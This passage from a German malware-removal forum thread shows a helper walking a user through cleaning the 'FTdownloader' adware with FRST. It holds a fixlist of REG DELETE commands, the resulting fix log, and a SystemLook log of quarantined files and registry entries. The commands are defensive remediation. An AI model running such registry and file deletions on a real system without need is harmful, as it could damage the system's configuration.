reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c" /f
C:\Program Files\Enigma Software Group
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk
C:\Users\Moritz\AppData\Local\Cool_Mirage
C:\Program Files (x86)\FTDownloader.com
C:\Program Files (x86)\FTdownloader V4.0
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job
C:\Windows\Tasks\FTdownloader V4.0-enabler.job     
C:\Windows\Tasks\FTdownloader V4.0-updater.job

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.


Minter 13.08.2013 14:08
Wenn ich es auf dem Desktop speichere, findet FRST es nicht. Was / wo ist das Verzeich iss in dem sich FRST befindet?

cosinus 13.08.2013 14:21
Zitat:
wo ist das Verzeich iss in dem sich FRST befindet?
Das musst du doch wissen wo du das Tool abgespeichert hast :wtf:
Lad es neu runter auf den Desktop

Minter 13.08.2013 14:36
^^ Achso

Code:
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 13-08-2013
Ran by Moritz at 2013-08-13 15:34:47 Run:1
Running from C:\Users\Moritz\Desktop
Boot Mode: Normal
==============================================


========= REG DELETE "HKCU\Software\AppDataLow\Software\FTdownloader V4.0" /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Classes\FTDownloader"  /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32" /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS" /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater" /f =========

FEHLER: Zugriff verweigert



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\FTdownloader V4.0" /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp" /f =========

Der Vorgang wurde erfolgreich beendet.



========= End of Reg: =========


========= REG DELETE "HKU\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========


========= REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c" /f =========

FEHLER: Der angegebene Registrierungsschlssel bzw. Wert wurde nicht gefunden.


========= End of Reg: =========

"C:\Program Files\Enigma Software Group" => File/Directory not found.
C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Recent\FTdownloader V4.0.lnk => Moved successfully.
C:\Users\Moritz\AppData\Local\Cool_Mirage => Moved successfully.
"C:\Program Files (x86)\FTDownloader.com" => File/Directory not found.
C:\Program Files (x86)\FTdownloader V4.0 => Moved successfully.
C:\Windows\Tasks\FTdownloader V4.0-codedownloader.job => Moved successfully.
C:\Windows\Tasks\FTdownloader V4.0-enabler.job        => Moved successfully.
C:\Windows\Tasks\FTdownloader V4.0-updater.job => Moved successfully.

==== End of Fixlog ====

cosinus 13.08.2013 14:48
Sehr schön. Lade nochmal http://ryder.trojaner-board.de/spyhu...nterKiller.exe neu runter und führ diesen nochmal aus. Das Tool wurde eben erst aktualisiert.

Danach nochmal Systemlook wie schon zuvor gemacht und das neue Log posten

Minter 13.08.2013 15:02
Code:
SystemLook 30.07.11 by jpshortstuff
Log created at 16:00 on 13/08/2013 by Moritz
Administrator - Elevation successful

========== filefind ==========

Searching for "*FTdownloader*"
C:\FRST\Quarantine\FTdownloader V4.0-codedownloader.job        --a---- 1226 bytes        [12:16 26/07/2013]        [12:37 13/08/2013] DDF661E8F32DD055D5C6C0A178711B02
C:\FRST\Quarantine\FTdownloader V4.0-enabler.job        --a---- 1136 bytes        [12:16 26/07/2013]        [12:37 13/08/2013] F805BB31237EC183E3DE019756961A9E
C:\FRST\Quarantine\FTdownloader V4.0-updater.job        --a---- 1232 bytes        [12:16 26/07/2013]        [12:37 13/08/2013] 33E221F47F84CA666E567C921A1C1B83
C:\FRST\Quarantine\FTdownloader V4.0.lnk        --a---- 726 bytes        [07:36 13/08/2013]        [07:36 13/08/2013] 790AACB9534E01ABB21F1480C6D9A1B8
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil.dll        --a---- 393216 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 079E87F2A760FC41C6A6767BCB87B5F2
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil.exe        --a---- 338432 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] BA25FC5D1BEDBE821F063D6956BEBA4D
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.dll        --a---- 473088 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] D2E25B7E08F1370BE1B649E96B33142F
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-buttonutil64.exe        --a---- 442880 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 2185767A2A7BCA1CD4570E0DCF6F9350
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0-helper.exe        --a---- 311808 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 033E5078BCE5B537286E8E256C91D434
C:\FRST\Quarantine\FTdownloader V4.0\FTdownloader V4.0.ico        --a---- 9662 bytes        [11:19 30/06/2013]        [11:19 30/06/2013] 0A8D41A2552E2FC0A5CCD4AEB106FBF2
C:\Windows\System32\Tasks\FTdownloader V4.0-codedownloader        --a---- 4256 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 77F95681B9972C1DDE808B209EAC739B
C:\Windows\System32\Tasks\FTdownloader V4.0-enabler        --a---- 4166 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] 3C451D483016AB248AC0B8FBDB56E673
C:\Windows\System32\Tasks\FTdownloader V4.0-updater        --a---- 4262 bytes        [12:16 26/07/2013]        [12:16 26/07/2013] A5216EE89CA0126CFBA1044B683DE65E

Searching for "*Spyhunter*"
C:\Windows\Prefetch\SPYHUNTER4.EXE-5B920D84.pf        --a---- 165806 bytes        [17:24 27/07/2013]        [13:46 12/08/2013] 2F407C91D7454A65F9ED0F5947160ED8

========== folderfind ==========

Searching for "*FTdownloader*"
C:\FRST\Quarantine\FTdownloader V4.0        d------        [12:15 26/07/2013]
C:\FRST\Quarantine\Cool_Mirage\FTDownloader.exe_Url_srel2ybtny14zdfla5iaze4jen4lh3ou        d------        [12:15 26/07/2013]

Searching for "*Spyhunter*"
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_997024d9eee954d58adce9df23e313ac85ddeb93_22397c02        d----c-        [18:32 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_0874959b        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1494f3a1        d----c-        [17:55 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_1bab9981        d----c-        [17:54 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_2286f8b0        d----c-        [17:53 07/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_18795e35        d----c-        [17:17 11/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1c84dcc7        d----c-        [13:45 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1dd3228e        d----c-        [13:43 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f6b067f173fa882a2e1b844d5def27f99947b79_1f3d257a        d----c-        [13:46 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\AppHang_SpyHunter4.exe_f7779eb6f2bbcb0413114bc997390a421bbd6_22c92876        d----c-        [15:10 12/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_19596652        d----c-        [18:18 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_24c0d0e6        d----c-        [18:13 10/08/2013]
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\AppHang_SpyHunter4.exe_c1882c5de1e29aaff9448d1ababe37c864fa86_cab_21004450        d----c-        [17:54 07/08/2013]

========== regfind ==========

Searching for "FTdownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}]
"Path"="\FTdownloader V4.0-updater"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}]
"Path"="\FTdownloader V4.0-enabler"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}]
"Path"="\FTdownloader V4.0-codedownloader"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater]
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppName"="FTdownloader V4.0-buttonutil64.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppName"="FTdownloader V4.0-codedownloader.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppName"="FTdownloader V4.0-bg.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppName"="FTdownloader V4.0-buttonutil.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppName"="FTdownloader V4.0-helper.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c}]
"AppPath"="C:\Program Files (x86)\FTdownloader V4.0"

Searching for "Spyhunter"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\Defs\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\167ED423049710645A22436AA88D0A99]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\1F94163E4B8E8524AB2D208677C1C639]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoCheckUpdate"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\21B3B2A547DD5C14583129BD7D54AE43]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\270D6EC2A97B99548BA1F764A91027A1]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\2BAC083D35096B44C91BE7BCF2A9BE35]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\325484F6157B534449A295F31E20CC49]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\EsgScanner.inf"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3A1F744C14FB4E14A93C1628CDE36240]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorWinCom_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3B801397615ADA446AA0C0D27F8C35F5]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ShieldOnBoot"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\4EE16055EDFAB8E46BCE054F706E7050]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5942B0FB3B0060E4FB3008F9D51CFC26]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\native.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5A2C306FF7B069949928B69774A9C8A0]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\GuardStatus"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\64717EB28EB8ECA4A9584B6BA7934B83]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActiveDesktop_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\79455857BB467F24D81891AAD09F7079]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGScanner.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8014B476AFF7674499E83E22C791A5A2]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8D95E4363DF07F44FB6986E629D65FDB]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActHomePageProt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\96F935B48BE0455459DB1E7E97E04BDF]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorDNS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\9BDCF589B9440364E8DB3F9535DDBB9F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Defman.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B435C9AD1BF350D48BE80D5A79BA2EEE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGRKCHK.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B8759E73AEB287C4485B33F51B7DE868]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorIEImages"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\C2E30ACAB517FB744ACF4672E649BE7F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\Language"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\CA1A35F40F64E2C419551606C418D4C6]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoUpdateDownload"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D23A4A6BB4BD7474197B486733BBB37A]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ShScanner.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D69C9067CD45885488F1E05319EDD023]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ExecutionGuard.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D75FE63EDA1D54A4CA6F51CADD11E656]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\CheckShOsCompatibility"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D91BE455A0889C4458F258847859EC6F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorHosts"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\DD372D2F4DF0D0540B2F37ED85511E4C]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorSystem"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\F87702C2D0F509E4FB7923DA78F44976]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\FD27396ADF8235D449146899FD9100FE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Common.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2ADE6BE8-2517-44DA-8E26-F013C9BE50A9}]
